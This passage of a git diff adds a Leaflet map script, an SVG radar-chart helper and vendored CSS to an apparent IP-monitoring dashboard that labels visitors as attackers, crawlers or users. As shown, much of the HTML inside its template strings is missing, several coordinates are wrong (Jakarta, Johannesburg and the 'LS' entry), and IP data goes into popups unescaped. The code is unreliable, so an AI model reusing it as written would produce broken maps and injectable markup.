'Lisbon': [38.7223, -9.1393], + 'Brussels': [50.8503, 4.3517], 'Dublin': [53.3498, -6.2603], + 'Zurich': [47.3769, 8.5417], 'Geneva': [46.2044, 6.1432], + 'Helsinki': [60.1699, 24.9384], 'Bucharest': [44.4268, 26.1025], + 'Saint Petersburg': [59.9343, 30.3351], 'Manchester': [53.4808, -2.2426], + 'Roubaix': [50.6942, 3.1746], 'Frankfurt': [50.1109, 8.6821], + 'Munich': [48.1351, 11.5820], 'Hamburg': [53.5511, 9.9937], + // Asia + 'Tokyo': [35.6762, 139.6503], 'Beijing': [39.9042, 116.4074], + 'Shanghai': [31.2304, 121.4737], 'Singapore': [1.3521, 103.8198], + 'Mumbai': [19.0760, 72.8777], 'Delhi': [28.7041, 77.1025], + 'Bangalore': [12.9716, 77.5946], 'Seoul': [37.5665, 126.9780], + 'Hong Kong': [22.3193, 114.1694], 'Bangkok': [13.7563, 100.5018], + 'Jakarta': [6.2088, 106.8456], 'Manila': [14.5995, 120.9842], + 'Hanoi': [21.0285, 105.8542], 'Ho Chi Minh 
City': [10.8231, 106.6297], + 'Taipei': [25.0330, 121.5654], 'Kuala Lumpur': [3.1390, 101.6869], + 'Karachi': [24.8607, 67.0011], 'Islamabad': [33.6844, 73.0479], + 'Dhaka': [23.8103, 90.4125], 'Colombo': [6.9271, 79.8612], + // South America + 'São Paulo': [-23.5505, -46.6333], 'Rio de Janeiro': [-22.9068, -43.1729], + 'Buenos Aires': [-34.6037, -58.3816], 'Bogotá': [4.7110, -74.0721], + 'Lima': [-12.0464, -77.0428], 'Santiago': [-33.4489, -70.6693], + // Middle East & Africa + 'Cairo': [30.0444, 31.2357], 'Dubai': [25.2048, 55.2708], + 'Istanbul': [41.0082, 28.9784], 'Tel Aviv': [32.0853, 34.7818], + 'Johannesburg': [26.2041, 28.0473], 'Lagos': [6.5244, 3.3792], + 'Nairobi': [-1.2921, 36.8219], 'Cape Town': [-33.9249, 18.4241], + // Australia & Oceania + 'Sydney': [-33.8688, 151.2093], 'Melbourne': [-37.8136, 144.9631], + 'Brisbane': [-27.4698, 153.0251], 'Perth': [-31.9505, 115.8605], + 'Auckland': [-36.8485, 174.7633], + // Additional cities + 'Unknown': null +}; + +// Country center coordinates (fallback when city not found) +const countryCoordinates = { + 'US': [37.1, -95.7], 'GB': [55.4, -3.4], 'CN': [35.9, 104.1], 'RU': [61.5, 105.3], + 'JP': [36.2, 138.3], 'DE': [51.2, 10.5], 'FR': [46.6, 2.2], 'IN': [20.6, 78.96], + 'BR': [-14.2, -51.9], 'CA': [56.1, -106.3], 'AU': [-25.3, 133.8], 'MX': [23.6, -102.6], + 'ZA': [-30.6, 22.9], 'KR': [35.9, 127.8], 'IT': [41.9, 12.6], 'ES': [40.5, -3.7], + 'NL': [52.1, 5.3], 'SE': [60.1, 18.6], 'CH': [46.8, 8.2], 'PL': [51.9, 19.1], + 'SG': [1.4, 103.8], 'HK': [22.4, 114.1], 'TW': [23.7, 120.96], 'TH': [15.9, 100.9], + 'VN': [14.1, 108.8], 'ID': [-0.8, 113.2], 'PH': [12.9, 121.8], 'MY': [4.2, 101.7], + 'PK': [30.4, 69.2], 'BD': [23.7, 90.4], 'NG': [9.1, 8.7], 'EG': [26.8, 30.8], + 'TR': [38.9, 35.2], 'IR': [32.4, 53.7], 'AE': [23.4, 53.8], 'KZ': [48.0, 66.9], + 'UA': [48.4, 31.2], 'BG': [42.7, 25.5], 'RO': [45.9, 24.97], 'CZ': [49.8, 15.5], + 'HU': [47.2, 19.5], 'AT': [47.5, 14.6], 'BE': [50.5, 4.5], 'DK': [56.3, 9.5], + 
'FI': [61.9, 25.8], 'NO': [60.5, 8.5], 'GR': [39.1, 21.8], 'PT': [39.4, -8.2], + 'AR': [-38.4161, -63.6167], 'CO': [4.5709, -74.2973], 'CL': [-35.6751, -71.5430], + 'PE': [-9.1900, -75.0152], 'VE': [6.4238, -66.5897], 'LS': [40.0, -100.0] +}; + +// Helper function to get coordinates for an IP +function getIPCoordinates(ip) { + if (ip.latitude != null && ip.longitude != null) { + return [ip.latitude, ip.longitude]; + } + if (ip.city && cityCoordinates[ip.city]) { + return cityCoordinates[ip.city]; + } + if (ip.country_code && countryCoordinates[ip.country_code]) { + return countryCoordinates[ip.country_code]; + } + return null; +} + +// Fetch IPs from the API, handling pagination for "all" +async function fetchIpsForMap(limit) { + const DASHBOARD_PATH = window.__DASHBOARD_PATH__ || ''; + const headers = { 'Cache-Control': 'no-cache', 'Pragma': 'no-cache' }; + + if (limit === 'all') { + // Fetch in pages of 1000 until we have everything + let collected = []; + let page = 1; + const pageSize = 1000; + while (true) { + const response = await fetch( + `${DASHBOARD_PATH}/api/all-ips?page=${page}&page_size=${pageSize}&sort_by=total_requests&sort_order=desc`, + { cache: 'no-store', headers } + ); + if (!response.ok) throw new Error('Failed to fetch IPs'); + const data = await response.json(); + collected = collected.concat(data.ips || []); + if (page >= data.pagination.total_pages) break; + page++; + } + return collected; + } + + const pageSize = parseInt(limit, 10); + const response = await fetch( + `${DASHBOARD_PATH}/api/all-ips?page=1&page_size=${pageSize}&sort_by=total_requests&sort_order=desc`, + { cache: 'no-store', headers } + ); + if (!response.ok) throw new Error('Failed to fetch IPs'); + const data = await response.json(); + return data.ips || []; +} + +// Build markers from an IP list and add them to the map +function buildMapMarkers(ips) { + // Clear existing cluster group + if (clusterGroup) { + attackerMap.removeLayer(clusterGroup); + 
clusterGroup.clearLayers(); + } + mapMarkers = []; + + // Single cluster group with custom pie-chart icons + clusterGroup = L.markerClusterGroup({ + maxClusterRadius: 35, + spiderfyOnMaxZoom: true, + showCoverageOnHover: false, + zoomToBoundsOnClick: true, + disableClusteringAtZoom: 8, + iconCreateFunction: createClusterIcon + }); + + // Track used coordinates to add small offsets for overlapping markers + const usedCoordinates = {}; + function getUniqueCoordinates(baseCoords) { + const key = `${baseCoords[0].toFixed(4)},${baseCoords[1].toFixed(4)}`; + if (!usedCoordinates[key]) { + usedCoordinates[key] = 0; + } + usedCoordinates[key]++; + + if (usedCoordinates[key] === 1) { + return baseCoords; + } + + const angle = (usedCoordinates[key] * 137.5) % 360; + const distance = 0.05 * Math.sqrt(usedCoordinates[key]); + const latOffset = distance * Math.cos(angle * Math.PI / 180); + const lngOffset = distance * Math.sin(angle * Math.PI / 180); + + return [ + baseCoords[0] + latOffset, + baseCoords[1] + lngOffset + ]; + } + + const DASHBOARD_PATH = window.__DASHBOARD_PATH__ || ''; + + ips.forEach(ip => { + if (!ip.country_code || !ip.category) return; + + const baseCoords = getIPCoordinates(ip); + if (!baseCoords) return; + + const coords = getUniqueCoordinates(baseCoords); + const category = ip.category.toLowerCase(); + if (!categoryColors[category]) return; + + const requestsForScale = Math.min(ip.total_requests, 10000); + const sizeRatio = Math.pow(requestsForScale / 10000, 0.5); + const markerSize = Math.max(10, Math.min(30, 10 + (sizeRatio * 20))); + + const markerElement = document.createElement('div'); + markerElement.className = `ip-marker marker-${category}`; + markerElement.style.width = markerSize + 'px'; + markerElement.style.height = markerSize + 'px'; + markerElement.style.fontSize = (markerSize * 0.5) + 'px'; + markerElement.textContent = '\u25CF'; + + const marker = L.marker(coords, { + icon: L.divIcon({ + html: markerElement.outerHTML, + iconSize: 
[markerSize, markerSize], + className: `ip-custom-marker category-${category}` + }), + category: category + }); + + const categoryColor = categoryColors[category] || '#8b949e'; + const categoryLabels = { + attacker: 'Attacker', + bad_crawler: 'Bad Crawler', + good_crawler: 'Good Crawler', + regular_user: 'Regular User', + unknown: 'Unknown' + }; + + marker.bindPopup('', { + maxWidth: 550, + className: 'ip-detail-popup' + }); + + marker.on('click', async function(e) { + const loadingPopup = ` +
+
+ ${ip.ip} + + ${categoryLabels[category]} + +
+
+
Loading details...
+
+
+ `; + + marker.setPopupContent(loadingPopup); + marker.openPopup(); + + try { + const response = await fetch(`${DASHBOARD_PATH}/api/ip-stats/${ip.ip}`); + if (!response.ok) throw new Error('Failed to fetch IP stats'); + + const stats = await response.json(); + + let popupContent = ` +
+
+ ${ip.ip} + +
+
+ + ${categoryLabels[category]} + +
+ + ${ip.city ? (ip.country_code ? `${ip.city}, ${ip.country_code}` : ip.city) : (ip.country_code || 'Unknown')} +
+
+
Requests: ${ip.total_requests}
+
First Seen: ${formatTimestamp(ip.first_seen)}
+
Last Seen: ${formatTimestamp(ip.last_seen)}
+
+ `; + + if (stats.category_scores && Object.keys(stats.category_scores).length > 0) { + const chartHtml = generateMapPanelRadarChart(stats.category_scores); + popupContent += ` +
+ ${chartHtml} +
+ `; + } + + popupContent += '
'; + marker.setPopupContent(popupContent); + } catch (err) { + console.error('Error fetching IP stats:', err); + const errorPopup = ` +
+
+ ${ip.ip} + +
+
+ + ${categoryLabels[category]} + +
+ + ${ip.city ? (ip.country_code ? `${ip.city}, ${ip.country_code}` : ip.city) : (ip.country_code || 'Unknown')} +
+
+
Requests: ${ip.total_requests}
+
First Seen: ${formatTimestamp(ip.first_seen)}
+
Last Seen: ${formatTimestamp(ip.last_seen)}
+
+
+ Failed to load chart: ${err.message} +
+
+ `; + marker.setPopupContent(errorPopup); + } + }); + + mapMarkers.push(marker); + // Only add to cluster if category is not hidden + if (!hiddenCategories.has(category)) { + clusterGroup.addLayer(marker); + } + }); + + attackerMap.addLayer(clusterGroup); + + // Fit map to visible markers + const visibleMarkers = mapMarkers.filter(m => !hiddenCategories.has(m.options.category)); + if (visibleMarkers.length > 0) { + const bounds = L.featureGroup(visibleMarkers).getBounds(); + attackerMap.fitBounds(bounds, { padding: [50, 50] }); + } +} + +async function initializeAttackerMap() { + const mapContainer = document.getElementById('attacker-map'); + if (!mapContainer || attackerMap) return; + + try { + attackerMap = L.map('attacker-map', { + center: [20, 0], + zoom: 2, + layers: [ + L.tileLayer('https://{s}.basemaps.cartocdn.com/dark_all/{z}/{x}/{y}{r}.png', { + attribution: '© CartoDB | © OpenStreetMap contributors', + maxZoom: 19, + subdomains: 'abcd' + }) + ] + }); + + // Get the selected limit from the dropdown (default 100) + const limitSelect = document.getElementById('map-ip-limit'); + const limit = limitSelect ? limitSelect.value : '100'; + + allIps = await fetchIpsForMap(limit); + + if (allIps.length === 0) { + mapContainer.innerHTML = '
No IP location data available
'; + return; + } + + buildMapMarkers(allIps); + + // Force Leaflet to recalculate container size after the tab becomes visible. + setTimeout(() => { + if (attackerMap) attackerMap.invalidateSize(); + }, 300); + + } catch (err) { + console.error('Error initializing attacker map:', err); + mapContainer.innerHTML = '
Failed to load map: ' + err.message + '
'; + } +} + +// Reload map markers when the user changes the IP limit selector +async function reloadMapWithLimit(limit) { + if (!attackerMap) return; + + // Show loading state + const mapContainer = document.getElementById('attacker-map'); + const overlay = document.createElement('div'); + overlay.id = 'map-loading-overlay'; + overlay.style.cssText = 'position:absolute;top:0;left:0;right:0;bottom:0;background:rgba(13,17,23,0.7);display:flex;align-items:center;justify-content:center;z-index:1000;color:#8b949e;font-size:14px;'; + overlay.textContent = 'Loading IPs...'; + mapContainer.style.position = 'relative'; + mapContainer.appendChild(overlay); + + try { + allIps = await fetchIpsForMap(limit); + buildMapMarkers(allIps); + } catch (err) { + console.error('Error reloading map:', err); + } finally { + const existing = document.getElementById('map-loading-overlay'); + if (existing) existing.remove(); + } +} + +// Update map filters based on checkbox selection +function updateMapFilters() { + if (!attackerMap || !clusterGroup) return; + + hiddenCategories.clear(); + document.querySelectorAll('.map-filter').forEach(cb => { + const category = cb.getAttribute('data-category'); + if (category && !cb.checked) hiddenCategories.add(category); + }); + + // Rebuild cluster group with only visible markers + clusterGroup.clearLayers(); + const visible = mapMarkers.filter(m => !hiddenCategories.has(m.options.category)); + clusterGroup.addLayers(visible); +} + +// Generate radar chart SVG for map panel popups +function generateMapPanelRadarChart(categoryScores) { + if (!categoryScores || Object.keys(categoryScores).length === 0) { + return '
No category data available
'; + } + + let html = '
'; + html += ''; + + const scores = { + attacker: categoryScores.attacker || 0, + good_crawler: categoryScores.good_crawler || 0, + bad_crawler: categoryScores.bad_crawler || 0, + regular_user: categoryScores.regular_user || 0, + unknown: categoryScores.unknown || 0 + }; + + const maxScore = Math.max(...Object.values(scores), 1); + const minVisibleRadius = 0.15; + const normalizedScores = {}; + + Object.keys(scores).forEach(key => { + normalizedScores[key] = minVisibleRadius + (scores[key] / maxScore) * (1 - minVisibleRadius); + }); + + const colors = { + attacker: '#f85149', + good_crawler: '#3fb950', + bad_crawler: '#f0883e', + regular_user: '#58a6ff', + unknown: '#8b949e' + }; + + const labels = { + attacker: 'Attacker', + good_crawler: 'Good Bot', + bad_crawler: 'Bad Bot', + regular_user: 'User', + unknown: 'Unknown' + }; + + const cx = 100, cy = 100, maxRadius = 75; + for (let i = 1; i <= 5; i++) { + const r = (maxRadius / 5) * i; + html += ``; + } + + const angles = [0, 72, 144, 216, 288]; + const keys = ['good_crawler', 'regular_user', 'unknown', 'bad_crawler', 'attacker']; + + angles.forEach((angle, i) => { + const rad = (angle - 90) * Math.PI / 180; + const x2 = cx + maxRadius * Math.cos(rad); + const y2 = cy + maxRadius * Math.sin(rad); + html += ``; + + const labelDist = maxRadius + 35; + const lx = cx + labelDist * Math.cos(rad); + const ly = cy + labelDist * Math.sin(rad); + html += `${labels[keys[i]]}`; + }); + + let points = []; + angles.forEach((angle, i) => { + const normalizedScore = normalizedScores[keys[i]]; + const rad = (angle - 90) * Math.PI / 180; + const r = normalizedScore * maxRadius; + const x = cx + r * Math.cos(rad); + const y = cy + r * Math.sin(rad); + points.push(`${x},${y}`); + }); + + const dominantKey = Object.keys(scores).reduce((a, b) => scores[a] > scores[b] ? 
a : b); + const dominantColor = colors[dominantKey]; + + html += ``; + + angles.forEach((angle, i) => { + const normalizedScore = normalizedScores[keys[i]]; + const rad = (angle - 90) * Math.PI / 180; + const r = normalizedScore * maxRadius; + const x = cx + r * Math.cos(rad); + const y = cy + r * Math.sin(rad); + html += ``; + }); + + html += ''; + html += '
'; + return html; +} diff --git a/src/templates/static/js/radar.js b/src/templates/static/js/radar.js new file mode 100644 index 0000000..fbe4974 --- /dev/null +++ b/src/templates/static/js/radar.js @@ -0,0 +1,130 @@ +// Radar chart generation for IP stats +// Used by map popups and IP detail partials +// Extracted from dashboard_template.py (lines ~2092-2181) + +/** + * Generate an SVG radar chart for category scores. + * This is a reusable function that can be called from: + * - Map popup panels (generateMapPanelRadarChart in map.js) + * - IP detail partials (server-side or client-side rendering) + * + * @param {Object} categoryScores - Object with keys: attacker, good_crawler, bad_crawler, regular_user, unknown + * @param {number} [size=200] - Width/height of the SVG in pixels + * @param {boolean} [showLegend=true] - Whether to show the legend below the chart + * @param {string} [legendPosition='below'] - 'below' or 'side' (side = legend to the right of the chart) + * @returns {string} HTML string containing the SVG radar chart + */ +function generateRadarChart(categoryScores, size, showLegend, legendPosition) { + size = size || 200; + if (showLegend === undefined) showLegend = true; + legendPosition = legendPosition || 'below'; + + if (!categoryScores || Object.keys(categoryScores).length === 0) { + return '
No category data available
'; + } + + const scores = { + attacker: categoryScores.attacker || 0, + good_crawler: categoryScores.good_crawler || 0, + bad_crawler: categoryScores.bad_crawler || 0, + regular_user: categoryScores.regular_user || 0, + unknown: categoryScores.unknown || 0 + }; + + const maxScore = Math.max(...Object.values(scores), 1); + const minVisibleRadius = 0.15; + const normalizedScores = {}; + + Object.keys(scores).forEach(key => { + normalizedScores[key] = minVisibleRadius + (scores[key] / maxScore) * (1 - minVisibleRadius); + }); + + const colors = { + attacker: '#f85149', + good_crawler: '#3fb950', + bad_crawler: '#f0883e', + regular_user: '#58a6ff', + unknown: '#8b949e' + }; + + const labels = { + attacker: 'Attacker', + good_crawler: 'Good Bot', + bad_crawler: 'Bad Bot', + regular_user: 'User', + unknown: 'Unknown' + }; + + const cx = 100, cy = 100, maxRadius = 75; + + const flexDir = legendPosition === 'side' ? 'row' : 'column'; + let html = `
`; + html += ``; + + // Draw concentric circles (grid) + for (let i = 1; i <= 5; i++) { + const r = (maxRadius / 5) * i; + html += ``; + } + + const angles = [0, 72, 144, 216, 288]; + const keys = ['good_crawler', 'regular_user', 'unknown', 'bad_crawler', 'attacker']; + + // Draw axis lines and labels + angles.forEach((angle, i) => { + const rad = (angle - 90) * Math.PI / 180; + const x2 = cx + maxRadius * Math.cos(rad); + const y2 = cy + maxRadius * Math.sin(rad); + html += ``; + + const labelDist = maxRadius + 35; + const lx = cx + labelDist * Math.cos(rad); + const ly = cy + labelDist * Math.sin(rad); + html += `${labels[keys[i]]}`; + }); + + // Calculate polygon points + let points = []; + angles.forEach((angle, i) => { + const normalizedScore = normalizedScores[keys[i]]; + const rad = (angle - 90) * Math.PI / 180; + const r = normalizedScore * maxRadius; + const x = cx + r * Math.cos(rad); + const y = cy + r * Math.sin(rad); + points.push(`${x},${y}`); + }); + + // Determine dominant category for color + const dominantKey = Object.keys(scores).reduce((a, b) => scores[a] > scores[b] ? a : b); + const dominantColor = colors[dominantKey]; + + // Draw filled polygon + html += ``; + + // Draw data point dots + angles.forEach((angle, i) => { + const normalizedScore = normalizedScores[keys[i]]; + const rad = (angle - 90) * Math.PI / 180; + const r = normalizedScore * maxRadius; + const x = cx + r * Math.cos(rad); + const y = cy + r * Math.sin(rad); + html += ``; + }); + + html += ''; + + // Optional legend + if (showLegend) { + html += '
'; + keys.forEach(key => { + html += '
'; + html += `
`; + html += `${labels[key]}: ${scores[key]} pt`; + html += '
'; + }); + html += '
'; + } + + html += '
'; + return html; +} diff --git a/src/templates/static/vendor/css/MarkerCluster.Default.css b/src/templates/static/vendor/css/MarkerCluster.Default.css new file mode 100644 index 0000000..bbc8c9f --- /dev/null +++ b/src/templates/static/vendor/css/MarkerCluster.Default.css @@ -0,0 +1,60 @@ +.marker-cluster-small { + background-color: rgba(181, 226, 140, 0.6); + } +.marker-cluster-small div { + background-color: rgba(110, 204, 57, 0.6); + } + +.marker-cluster-medium { + background-color: rgba(241, 211, 87, 0.6); + } +.marker-cluster-medium div { + background-color: rgba(240, 194, 12, 0.6); + } + +.marker-cluster-large { + background-color: rgba(253, 156, 115, 0.6); + } +.marker-cluster-large div { + background-color: rgba(241, 128, 23, 0.6); + } + + /* IE 6-8 fallback colors */ +.leaflet-oldie .marker-cluster-small { + background-color: rgb(181, 226, 140); + } +.leaflet-oldie .marker-cluster-small div { + background-color: rgb(110, 204, 57); + } + +.leaflet-oldie .marker-cluster-medium { + background-color: rgb(241, 211, 87); + } +.leaflet-oldie .marker-cluster-medium div { + background-color: rgb(240, 194, 12); + } + +.leaflet-oldie .marker-cluster-large { + background-color: rgb(253, 156, 115); + } +.leaflet-oldie .marker-cluster-large div { + background-color: rgb(241, 128, 23); +} + +.marker-cluster { + background-clip: padding-box; + border-radius: 20px; + } +.marker-cluster div { + width: 30px; + height: 30px; + margin-left: 5px; + margin-top: 5px; + + text-align: center; + border-radius: 15px; + font: 12px "Helvetica Neue", Arial, Helvetica, sans-serif; + } +.marker-cluster span { + line-height: 30px; + } \ No newline at end of file diff --git a/src/templates/static/vendor/css/MarkerCluster.css b/src/templates/static/vendor/css/MarkerCluster.css new file mode 100644 index 0000000..c60d71b --- /dev/null +++ b/src/templates/static/vendor/css/MarkerCluster.css @@ -0,0 +1,14 @@ +.leaflet-cluster-anim .leaflet-marker-icon, .leaflet-cluster-anim 
.leaflet-marker-shadow { + -webkit-transition: -webkit-transform 0.3s ease-out, opacity 0.3s ease-in; + -moz-transition: -moz-transform 0.3s ease-out, opacity 0.3s ease-in; + -o-transition: -o-transform 0.3s ease-out, opacity 0.3s ease-in; + transition: transform 0.3s ease-out, opacity 0.3s ease-in; +} + +.leaflet-cluster-spider-leg { + /* stroke-dashoffset (duration and function) should match with leaflet-marker-icon transform in order to track it exactly */ + -webkit-transition: -webkit-stroke-dashoffset 0.3s ease-out, -webkit-stroke-opacity 0.3s ease-in; + -moz-transition: -moz-stroke-dashoffset 0.3s ease-out, -moz-stroke-opacity 0.3s ease-in; + -o-transition: -o-stroke-dashoffset 0.3s ease-out, -o-stroke-opacity 0.3s ease-in; + transition: stroke-dashoffset 0.3s ease-out, stroke-opacity 0.3s ease-in; +} diff --git a/src/templates/static/vendor/css/images/layers-2x.png b/src/templates/static/vendor/css/images/layers-2x.png new file mode 100644 index 0000000..200c333 Binary files /dev/null and b/src/templates/static/vendor/css/images/layers-2x.png differ diff --git a/src/templates/static/vendor/css/images/layers.png b/src/templates/static/vendor/css/images/layers.png new file mode 100644 index 0000000..1a72e57 Binary files /dev/null and b/src/templates/static/vendor/css/images/layers.png differ diff --git a/src/templates/static/vendor/css/images/marker-icon-2x.png b/src/templates/static/vendor/css/images/marker-icon-2x.png new file mode 100644 index 0000000..88f9e50 Binary files /dev/null and b/src/templates/static/vendor/css/images/marker-icon-2x.png differ diff --git a/src/templates/static/vendor/css/images/marker-icon.png b/src/templates/static/vendor/css/images/marker-icon.png new file mode 100644 index 0000000..950edf2 Binary files /dev/null and b/src/templates/static/vendor/css/images/marker-icon.png differ diff --git a/src/templates/static/vendor/css/images/marker-shadow.png b/src/templates/static/vendor/css/images/marker-shadow.png new file mode 100644 
index 0000000..9fd2979 Binary files /dev/null and b/src/templates/static/vendor/css/images/marker-shadow.png differ diff --git a/src/templates/static/vendor/css/leaflet.min.css b/src/templates/static/vendor/css/leaflet.min.css new file mode 100644 index 0000000..d9ee57d --- /dev/null +++ b/src/templates/static/vendor/css/leaflet.min.css @@ -0,0 +1 @@ +.leaflet-image-layer,.leaflet-layer,.leaflet-marker-icon,.leaflet-marker-shadow,.leaflet-pane,.leaflet-pane>canvas,.leaflet-pane>svg,.leaflet-tile,.leaflet-tile-container,.leaflet-zoom-box{position:absolute;left:0;top:0}.leaflet-container{overflow:hidden}.leaflet-marker-icon,.leaflet-marker-shadow,.leaflet-tile{-webkit-user-select:none;-moz-user-select:none;user-select:none;-webkit-user-drag:none}.leaflet-tile::selection{background:0 0}.leaflet-safari .leaflet-tile{image-rendering:-webkit-optimize-contrast}.leaflet-safari .leaflet-tile-container{width:1600px;height:1600px;-webkit-transform-origin:0 0}.leaflet-marker-icon,.leaflet-marker-shadow{display:block}.leaflet-container .leaflet-overlay-pane svg{max-width:none!important;max-height:none!important}.leaflet-container .leaflet-marker-pane img,.leaflet-container .leaflet-shadow-pane img,.leaflet-container .leaflet-tile,.leaflet-container .leaflet-tile-pane img,.leaflet-container img.leaflet-image-layer{max-width:none!important;max-height:none!important;width:auto;padding:0}.leaflet-container img.leaflet-tile{mix-blend-mode:plus-lighter}.leaflet-container.leaflet-touch-zoom{-ms-touch-action:pan-x pan-y;touch-action:pan-x pan-y}.leaflet-container.leaflet-touch-drag{-ms-touch-action:pinch-zoom;touch-action:none;touch-action:pinch-zoom}.leaflet-container.leaflet-touch-drag.leaflet-touch-zoom{-ms-touch-action:none;touch-action:none}.leaflet-container{-webkit-tap-highlight-color:transparent}.leaflet-container 
a{-webkit-tap-highlight-color:rgba(51,181,229,.4)}.leaflet-tile{filter:inherit;visibility:hidden}.leaflet-tile-loaded{visibility:inherit}.leaflet-zoom-box{width:0;height:0;-moz-box-sizing:border-box;box-sizing:border-box;z-index:800}.leaflet-overlay-pane svg{-moz-user-select:none}.leaflet-pane{z-index:400}.leaflet-tile-pane{z-index:200}.leaflet-overlay-pane{z-index:400}.leaflet-shadow-pane{z-index:500}.leaflet-marker-pane{z-index:600}.leaflet-tooltip-pane{z-index:650}.leaflet-popup-pane{z-index:700}.leaflet-map-pane canvas{z-index:100}.leaflet-map-pane svg{z-index:200}.leaflet-vml-shape{width:1px;height:1px}.lvml{behavior:url(#default#VML);display:inline-block;position:absolute}.leaflet-control{position:relative;z-index:800;pointer-events:visiblePainted;pointer-events:auto}.leaflet-bottom,.leaflet-top{position:absolute;z-index:1000;pointer-events:none}.leaflet-top{top:0}.leaflet-right{right:0}.leaflet-bottom{bottom:0}.leaflet-left{left:0}.leaflet-control{float:left;clear:both}.leaflet-right .leaflet-control{float:right}.leaflet-top .leaflet-control{margin-top:10px}.leaflet-bottom .leaflet-control{margin-bottom:10px}.leaflet-left .leaflet-control{margin-left:10px}.leaflet-right .leaflet-control{margin-right:10px}.leaflet-fade-anim .leaflet-popup{opacity:0;-webkit-transition:opacity .2s linear;-moz-transition:opacity .2s linear;transition:opacity .2s linear}.leaflet-fade-anim .leaflet-map-pane .leaflet-popup{opacity:1}.leaflet-zoom-animated{-webkit-transform-origin:0 0;-ms-transform-origin:0 0;transform-origin:0 0}svg.leaflet-zoom-animated{will-change:transform}.leaflet-zoom-anim .leaflet-zoom-animated{-webkit-transition:-webkit-transform .25s cubic-bezier(0,0,.25,1);-moz-transition:-moz-transform .25s cubic-bezier(0,0,.25,1);transition:transform .25s cubic-bezier(0,0,.25,1)}.leaflet-pan-anim .leaflet-tile,.leaflet-zoom-anim .leaflet-tile{-webkit-transition:none;-moz-transition:none;transition:none}.leaflet-zoom-anim 
.leaflet-zoom-hide{visibility:hidden}.leaflet-interactive{cursor:pointer}.leaflet-grab{cursor:-webkit-grab;cursor:-moz-grab;cursor:grab}.leaflet-crosshair,.leaflet-crosshair .leaflet-interactive{cursor:crosshair}.leaflet-control,.leaflet-popup-pane{cursor:auto}.leaflet-dragging .leaflet-grab,.leaflet-dragging .leaflet-grab .leaflet-interactive,.leaflet-dragging .leaflet-marker-draggable{cursor:move;cursor:-webkit-grabbing;cursor:-moz-grabbing;cursor:grabbing}.leaflet-image-layer,.leaflet-marker-icon,.leaflet-marker-shadow,.leaflet-pane>svg path,.leaflet-tile-container{pointer-events:none}.leaflet-image-layer.leaflet-interactive,.leaflet-marker-icon.leaflet-interactive,.leaflet-pane>svg path.leaflet-interactive,svg.leaflet-image-layer.leaflet-interactive path{pointer-events:visiblePainted;pointer-events:auto}.leaflet-container{background:#ddd;outline-offset:1px}.leaflet-container a{color:#0078a8}.leaflet-zoom-box{border:2px dotted #38f;background:rgba(255,255,255,.5)}.leaflet-container{font-family:"Helvetica Neue",Arial,Helvetica,sans-serif;font-size:12px;font-size:.75rem;line-height:1.5}.leaflet-bar{box-shadow:0 1px 5px rgba(0,0,0,.65);border-radius:4px}.leaflet-bar a{background-color:#fff;border-bottom:1px solid #ccc;width:26px;height:26px;line-height:26px;display:block;text-align:center;text-decoration:none;color:#000}.leaflet-bar a,.leaflet-control-layers-toggle{background-position:50% 50%;background-repeat:no-repeat;display:block}.leaflet-bar a:focus,.leaflet-bar a:hover{background-color:#f4f4f4}.leaflet-bar a:first-child{border-top-left-radius:4px;border-top-right-radius:4px}.leaflet-bar a:last-child{border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-bottom:none}.leaflet-bar a.leaflet-disabled{cursor:default;background-color:#f4f4f4;color:#bbb}.leaflet-touch .leaflet-bar a{width:30px;height:30px;line-height:30px}.leaflet-touch .leaflet-bar a:first-child{border-top-left-radius:2px;border-top-right-radius:2px}.leaflet-touch .leaflet-bar 
a:last-child{border-bottom-left-radius:2px;border-bottom-right-radius:2px}.leaflet-control-zoom-in,.leaflet-control-zoom-out{font:bold 18px 'Lucida Console',Monaco,monospace;text-indent:1px}.leaflet-touch .leaflet-control-zoom-in,.leaflet-touch .leaflet-control-zoom-out{font-size:22px}.leaflet-control-layers{box-shadow:0 1px 5px rgba(0,0,0,.4);background:#fff;border-radius:5px}.leaflet-control-layers-toggle{background-image:url(images/layers.png);width:36px;height:36px}.leaflet-retina .leaflet-control-layers-toggle{background-image:url(images/layers-2x.png);background-size:26px 26px}.leaflet-touch .leaflet-control-layers-toggle{width:44px;height:44px}.leaflet-control-layers .leaflet-control-layers-list,.leaflet-control-layers-expanded .leaflet-control-layers-toggle{display:none}.leaflet-control-layers-expanded .leaflet-control-layers-list{display:block;position:relative}.leaflet-control-layers-expanded{padding:6px 10px 6px 6px;color:#333;background:#fff}.leaflet-control-layers-scrollbar{overflow-y:scroll;overflow-x:hidden;padding-right:5px}.leaflet-control-layers-selector{margin-top:2px;position:relative;top:1px}.leaflet-control-layers label{display:block;font-size:13px;font-size:1.08333em}.leaflet-control-layers-separator{height:0;border-top:1px solid #ddd;margin:5px -10px 5px -6px}.leaflet-default-icon-path{background-image:url(images/marker-icon.png)}.leaflet-container .leaflet-control-attribution{background:#fff;background:rgba(255,255,255,.8);margin:0}.leaflet-control-attribution,.leaflet-control-scale-line{padding:0 5px;color:#333;line-height:1.4}.leaflet-control-attribution a{text-decoration:none}.leaflet-control-attribution a:focus,.leaflet-control-attribution a:hover{text-decoration:underline}.leaflet-attribution-flag{display:inline!important;vertical-align:baseline!important;width:1em;height:.6669em}.leaflet-left .leaflet-control-scale{margin-left:5px}.leaflet-bottom .leaflet-control-scale{margin-bottom:5px}.leaflet-control-scale-line{border:2px solid 
#777;border-top:none;line-height:1.1;padding:2px 5px 1px;white-space:nowrap;-moz-box-sizing:border-box;box-sizing:border-box;background:rgba(255,255,255,.8);text-shadow:1px 1px #fff}.leaflet-control-scale-line:not(:first-child){border-top:2px solid #777;border-bottom:none;margin-top:-2px}.leaflet-control-scale-line:not(:first-child):not(:last-child){border-bottom:2px solid #777}.leaflet-touch .leaflet-bar,.leaflet-touch .leaflet-control-attribution,.leaflet-touch .leaflet-control-layers{box-shadow:none}.leaflet-touch .leaflet-bar,.leaflet-touch .leaflet-control-layers{border:2px solid rgba(0,0,0,.2);background-clip:padding-box}.leaflet-popup{position:absolute;text-align:center;margin-bottom:20px}.leaflet-popup-content-wrapper{padding:1px;text-align:left;border-radius:12px}.leaflet-popup-content{margin:13px 24px 13px 20px;line-height:1.3;font-size:13px;font-size:1.08333em;min-height:1px}.leaflet-popup-content p{margin:17px 0;margin:1.3em 